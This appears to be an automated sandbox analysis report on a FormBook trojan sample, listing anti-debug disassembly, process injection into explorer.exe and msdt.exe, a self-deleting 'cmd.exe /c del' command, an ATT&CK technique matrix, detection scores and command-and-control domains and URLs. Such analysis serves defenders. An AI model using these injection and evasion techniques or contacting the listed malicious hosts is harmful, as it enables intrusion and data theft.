              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACAD30 mov eax, dword ptr fs:[00000030h]2_2_04ACAD30
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h]2_2_04AC9100
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h]2_2_04AC9100
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h]2_2_04AC9100
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACC962 mov eax, dword ptr fs:[00000030h]2_2_04ACC962
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h]2_2_04AEC577
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h]2_2_04AEC577
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h]2_2_04ACB171
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h]2_2_04ACB171
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h]2_2_04AEB944
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h]2_2_04AEB944
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B03D43 mov eax, dword ptr fs:[00000030h]2_2_04B03D43
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B43540 mov eax, dword ptr fs:[00000030h]2_2_04B43540
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE7D50 mov eax, dword ptr fs:[00000030h]2_2_04AE7D50
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]2_2_04AC52A5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]2_2_04AC52A5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]2_2_04AC52A5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]2_2_04AC52A5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h]2_2_04AC52A5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B446A7 mov eax, dword ptr fs:[00000030h]2_2_04B446A7
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h]2_2_04B90EA5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h]2_2_04B90EA5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h]2_2_04B90EA5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]2_2_04ADAAB0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]2_2_04ADAAB0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]2_2_04AFFAB0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B5FE87 mov eax, dword ptr fs:[00000030h]2_2_04B5FE87
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h]2_2_04AFD294
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h]2_2_04AFD294
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]2_2_04AF2AE4
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]2_2_04AF16E0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD76E2 mov eax, dword ptr fs:[00000030h]2_2_04AD76E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF36CC mov eax, dword ptr fs:[00000030h]2_2_04AF36CC
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2ACB mov eax, dword ptr fs:[00000030h]2_2_04AF2ACB
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B98ED6 mov eax, dword ptr fs:[00000030h]2_2_04B98ED6
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]2_2_04B7FEC0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B08EC7 mov eax, dword ptr fs:[00000030h]2_2_04B08EC7
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B7FE3F mov eax, dword ptr fs:[00000030h]2_2_04B7FE3F
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACE620 mov eax, dword ptr fs:[00000030h]2_2_04ACE620
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h]2_2_04B04A2C
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h]2_2_04B04A2C
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD8A0A mov eax, dword ptr fs:[00000030h]2_2_04AD8A0A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h]2_2_04ACC600
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h]2_2_04ACC600
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h]2_2_04ACC600
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF8E00 mov eax, dword ptr fs:[00000030h]2_2_04AF8E00
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81608 mov eax, dword ptr fs:[00000030h]2_2_04B81608
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE3A1C mov eax, dword ptr fs:[00000030h]2_2_04AE3A1C
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h]2_2_04AFA61C
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h]2_2_04AFA61C
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h]2_2_04ACAA16
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h]2_2_04ACAA16
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h]2_2_04AC5210
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC5210 mov ecx, dword ptr fs:[00000030h]2_2_04AC5210
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h]2_2_04AC5210
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h]2_2_04AC5210
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD766D mov eax, dword ptr fs:[00000030h]2_2_04AD766D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B0927A mov eax, dword ptr fs:[00000030h]2_2_04B0927A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h]2_2_04B7B260
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h]2_2_04B7B260
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B98A62 mov eax, dword ptr fs:[00000030h]2_2_04B98A62
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]2_2_04AEAE73
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]2_2_04AEAE73
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]2_2_04AEAE73
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]2_2_04AEAE73
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]2_2_04AEAE73
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B54257 mov eax, dword ptr fs:[00000030h]2_2_04B54257
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]2_2_04AC9240
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]2_2_04AC9240
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]2_2_04AC9240
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]2_2_04AC9240
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]2_2_04AD7E41
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]2_2_04AD7E41
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]2_2_04AD7E41
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]2_2_04AD7E41
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]2_2_04AD7E41
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]2_2_04AD7E41
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8EA55 mov eax, dword ptr fs:[00000030h]2_2_04B8EA55
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h]2_2_04B8AE44
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h]2_2_04B8AE44
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h]2_2_04AF4BAD
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h]2_2_04AF4BAD
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h]2_2_04AF4BAD
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B95BA5 mov eax, dword ptr fs:[00000030h]2_2_04B95BA5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h]2_2_04B47794
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h]2_2_04B47794
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h]2_2_04B47794
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h]2_2_04AD1B8F
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h]2_2_04AD1B8F
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8138A mov eax, dword ptr fs:[00000030h]2_2_04B8138A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B7D380 mov ecx, dword ptr fs:[00000030h]2_2_04B7D380
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2397 mov eax, dword ptr fs:[00000030h]2_2_04AF2397
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD8794 mov eax, dword ptr fs:[00000030h]2_2_04AD8794
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFB390 mov eax, dword ptr fs:[00000030h]2_2_04AFB390
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B037F5 mov eax, dword ptr fs:[00000030h]2_2_04B037F5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEDBE9 mov eax, dword ptr fs:[00000030h]2_2_04AEDBE9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]2_2_04AF03E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]2_2_04AF03E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]2_2_04AF03E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]2_2_04AF03E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]2_2_04AF03E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]2_2_04AF03E2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h]2_2_04B453CA
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h]2_2_04B453CA
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h]2_2_04AC4F2E
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h]2_2_04AC4F2E
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFE730 mov eax, dword ptr fs:[00000030h]2_2_04AFE730
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h]2_2_04AFA70E
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h]2_2_04AFA70E
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8131B mov eax, dword ptr fs:[00000030h]2_2_04B8131B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h]2_2_04B5FF10
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h]2_2_04B5FF10
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h]2_2_04B9070D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h]2_2_04B9070D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEF716 mov eax, dword ptr fs:[00000030h]2_2_04AEF716
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]2_2_04ACDB60
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADFF60 mov eax, dword ptr fs:[00000030h]2_2_04ADFF60
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B98F6A mov eax, dword ptr fs:[00000030h]2_2_04B98F6A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h]2_2_04AF3B7A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h]2_2_04AF3B7A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B98B58 mov eax, dword ptr fs:[00000030h]2_2_04B98B58
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACDB40 mov eax, dword ptr fs:[00000030h]2_2_04ACDB40
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADEF40 mov eax, dword ptr fs:[00000030h]2_2_04ADEF40
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACF358 mov eax, dword ptr fs:[00000030h]2_2_04ACF358
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A8ACE0 LdrLoadDll

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe; Domain query: www.controlplus.systems
              Source: C:\Windows\explorer.exe; Domain query: www.mogi.africa
              Source: C:\Windows\explorer.exe; Domain query: www.kellnovaglobalfood.info
              Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
              Source: C:\Users\user\Desktop\7pECKdsaig.exe; Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: B60000
              Source: C:\Users\user\Desktop\7pECKdsaig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\7pECKdsaig.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\7pECKdsaig.exe; Thread APC queued: target process: C:\Windows\explorer.exe
              Source: C:\Users\user\Desktop\7pECKdsaig.exe; Thread register set: target process: 3452
              Source: C:\Windows\SysWOW64\msdt.exe; Thread register set: target process: 3452
              Source: C:\Windows\SysWOW64\msdt.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
              Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: XProgram Manager
              Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.000000000833A000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
              Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock

              Stealing of Sensitive Information

              Source: Yara match; File source: 7pECKdsaig.exe, type: SAMPLE
              Source: Yara match; File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE

              Remote Access Functionality

              Source: Yara match; File source: 7pECKdsaig.exe, type: SAMPLE
              Source: Yara match; File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 1 Shared Modules | Path Interception | 512 Process Injection | 1 Rootkit | 1 Credential API Hooking | 121 Security Software Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | 1 Input Capture | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 4 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 512 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 3 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Source | Detection | Scanner | Label | Link
              7pECKdsaig.exe | 77% | ReversingLabs | Win32.Trojan.FormBook |
              7pECKdsaig.exe | 59% | Virustotal | | Browse
              7pECKdsaig.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
              7pECKdsaig.exe | 100% | Joe Sandbox ML | |

              No Antivirus matches

              Source | Detection | Scanner | Label | Link | Download
              0.0.7pECKdsaig.exe.a80000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
              0.2.7pECKdsaig.exe.a80000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

              Source | Detection | Scanner | Label | Link
              www.quickhealcareltd.co.uk | 0% | Virustotal | | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              controlplus.systems | 34.102.136.180 | true | false | | unknown
              kellnovaglobalfood.info | 34.102.136.180 | true | false | | unknown
              www.quickhealcareltd.co.uk | unknown | unknown | true | | unknown
              www.mogi.africa | unknown | unknown | true | | unknown
              www.kellnovaglobalfood.info | unknown | unknown | true | | unknown
              www.controlplus.systems | unknown | unknown | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ | false | Avira URL Cloud: malware | unknown
              http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ | false | Avira URL Cloud: malware | unknown
              www.2348x.com/ar73/ | true | Avira URL Cloud: malware | low

              Name | Source | Malicious | Antivirus Detection | Reputation
                          • Avira URL Cloud: safe
                          unknown
                          http://www.mtevz.onlineReferer:explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.b708.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.quickhealcareltd.co.ukexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.innovantexclusive.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.jacksontcpassettlement.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.1wwuwa.top/ar73/www.echadholisticbar.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.hurricanevalleyatvjamboree.comReferer:explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.ingrambaby.comReferer:explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.controlplus.systemsReferer:explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.authenticityhacking.com/ar73/www.ckpconsulting.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://www.mtevz.onlineexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.2348x.comReferer:explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.2348x.com/ar73/www.b708.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
